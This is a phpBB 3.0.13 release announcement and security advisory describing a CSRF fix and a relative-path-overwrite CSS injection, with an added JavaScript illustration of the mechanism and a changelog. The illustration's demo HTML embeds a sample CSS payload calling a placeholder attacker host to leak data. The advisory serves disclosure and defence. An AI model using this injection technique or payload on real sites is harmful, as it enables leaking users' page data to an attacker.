We are pleased to announce the "Return of the Bertie" release of phpBB 3.0.13. This version is a security and maintenance release of the 3.0.x branch which hardens phpBB against potential attacks and fixes a number of bugs. You do not need to install this update if you are running phpBB 3.1.x.
The first vulnerability is a cross-site request forgery (CSRF) that could allow an attacker to modify the private message setting that determines how full folders are handled (i.e. whether the oldest message is deleted or the new message is held until space is available). Users FBNeal and lampsys independently reported the issue to us.
The second issue, reported to us by James Kettle, allows an attacker to load arbitrary CSS in Internet Explorer by crafting a URL with a trailing path after a PHP file (for example /path/index.php/more/path). With such a URL the page's relative stylesheet references resolve underneath the crafted path, so the browser fetches the PHP script's own output as a stylesheet, and a lenient CSS parser will apply any attacker-controlled text in that output that looks like CSS. This is only possible if the webserver configuration allows PHP files to be requested with trailing path information in this manner. It can be exploited directly on Internet Explorer 7 or below, and on newer versions of Internet Explorer by using a frame that forces outdated rendering behavior.
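The following is an added illustration of the relative path overwrite mechanism, written for this page and not taken from phpBB or from the reporter. It uses the browser's own URL resolution to show where a relative stylesheet reference lands under a normal URL versus a URL with trailing path information, a server-side check for such requests, and a crude stand-in for a lenient CSS parser. The host forum.example, the stylesheet path, the HTML excerpt and the parser approximation are all constructed for the demonstration; the parser is not Internet Explorer's real algorithm.

```javascript
// Added example, not phpBB's code: why a trailing path after a PHP script
// (relative path overwrite, RPO) turns the page into its own "stylesheet".

// Resolve a stylesheet href the way a browser resolves
// <link rel="stylesheet" href="..."> on a page loaded from pageUrl.
function resolveStylesheet(pageUrl, href) {
  return new URL(href, pageUrl).href;
}

// Hypothetical server-side check: does the request path carry extra
// segments after the script name (PATH_INFO), e.g. /index.php/more/path?
function hasTrailingPathInfo(scriptName, requestPath) {
  return requestPath.startsWith(scriptName + "/");
}

// Crude stand-in for a lenient CSS parser that skips anything it cannot
// parse until it finds "selector { declarations }". Not IE's real algorithm;
// it only shows which fragments of an HTML body would survive as CSS rules.
function salvageCssRules(text) {
  const rules = [];
  const re = /([^{}]*)\{([^{}]*)\}/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    const selector = m[1].trim().split(/\s+/).pop() || "";
    const body = m[2].trim();
    if (body) rules.push(`${selector}{${body}}`);
  }
  return rules;
}

// Constructed demonstration; forum.example is a placeholder host and the
// HTML is a made-up excerpt containing attacker-supplied post text.
function demo() {
  const relHref = "styles/prosilver/theme/stylesheet.css";
  const absHref = "/styles/prosilver/theme/stylesheet.css";
  const normal = "https://forum.example/index.php";
  const crafted = "https://forum.example/index.php/more/path";
  const pageHtml =
    "<html><body><h1>Forum index</h1>" +
    "<p>{}*{background:url(//attacker.example/leak)}</p></body></html>";
  return {
    // relative href under the normal URL: the real stylesheet
    normal: resolveStylesheet(normal, relHref),
    // same href under the crafted URL: lands below index.php/more/, which the
    // server (if it accepts PATH_INFO) answers with index.php's HTML output
    crafted: resolveStylesheet(crafted, relHref),
    // an absolute href is unaffected by the trailing path
    craftedAbsolute: resolveStylesheet(crafted, absHref),
    pathInfo: hasTrailingPathInfo("/index.php", "/index.php/more/path"),
    // what a lenient parser would keep from the HTML served as "CSS"
    salvaged: salvageCssRules(pageHtml),
  };
}
```

The two defences the example points at are independent: rejecting or redirecting requests with trailing path information removes the crafted URL, and emitting absolute stylesheet paths makes resolution independent of the page URL even when the webserver still accepts such requests.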
Neither of these issues affects phpBB 3.1.x.
Thank you to James Kettle, FBNeal, and lampsys for responsibly reporting these issues to us.
This release further improves compatibility with PHP 5.6, Apache 2.4, Internet Explorer 11, and Microsoft Azure.
The full changelog is available in the changelog file within the docs folder contained in the release package. You can find the key highlights of this release on the wiki at https://wiki.phpbb.com/Release_Highlights/3.0.13 and a list of all issues fixed on our tracker at https://tracker.phpbb.com/issues/?filter=12892
The packages can be downloaded from our downloads page.
The development team thanks everyone who contributed code to this release: Oliver Schramm, erangamapa, Crizzo, s9e, Vjacheslav Trushkin, Jakub Senko, geetakshi, Marcos Bjorkelund, Marcus Vinicius, Matt Friedman, n-aleha, rechosen, Daniel Schosser, David Prévot, Falk Seidel, Igor Wiedler, Mario Skouat, Prosk8er
If you have any questions or comments, we'll be happy to address them in the discussion topic.
- The phpBB Team
Security and Hardening
- Security (CVE-2015-1431): CSS Injection via Relative Path Overwrite. Thanks to James Kettle for bringing this to our attention. See PHPBB3-13531.
- Security (CVE-2015-1432): The ucp_pm_options form key is now properly validated. Thanks to FBNeal and lampsys who reported this independently. See PHPBB3-13526.
- Hardening: Information received from the phpBB version server is now considered untrusted. See PHPBB3-13527.
- Hardening: The deregister_globals() function now better handles the case when $_COOKIE['GLOBALS'] is specified. See PHPBB3-13376.
- Hardening: Existence of the path to the imagick program specified in the Administration Control Panel is now verified. See PHPBB3-13519.
- Abuse Prevention: The "Send password" feature now sends anti-abuse headers in e-mail messages. See PHPBB3-11799.
- Improved Compatibility with Apache 2.4. See PHPBB3-11860.
- Improved Compatibility with PHP 5.6. See PHPBB3-12468, PHPBB3-13096 and PHPBB3-13168.
- Improved Compatibility with Internet Explorer 11. See PHPBB3-12093.
- Improved Compatibility with Microsoft Azure. See PHPBB3-9725 and PHPBB3-10796.
- "Edit signature" in the User Control Panel now correctly allows smilies to be selected for insertion. See PHPBB3-10037.
- Remote avatar upload now works correctly when HTTP server uses Keep-Alive. See PHPBB3-12755.
- An issue was fixed where the board would not load correctly for banned users. See PHPBB3-13138.
- Language strings containing numbers can now be used as HTML replacement in Custom BBcodes. See PHPBB3-12048.
- Cookies now work properly on local networks. See PHPBB3-11613.
- Published packages are now checksummed using the SHA-256 algorithm instead of MD5. See PHPBB3-11876.